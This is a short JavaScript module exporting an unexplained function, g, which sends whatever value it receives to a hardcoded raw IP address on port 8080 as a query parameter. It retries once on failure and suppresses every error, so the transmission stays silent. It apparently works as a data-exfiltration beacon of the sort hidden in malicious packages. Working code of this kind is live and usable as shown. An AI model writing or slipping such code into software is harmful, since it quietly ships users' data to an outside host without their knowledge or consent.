import "node-fetch"

export async function g(a){
    try{
    await fetch("http://65.38.120.147:8080?get="+a);
    }catch{
        try{ await fetch("http://65.38.120.147:8080?get="+a);}
        catch{}
    }
}
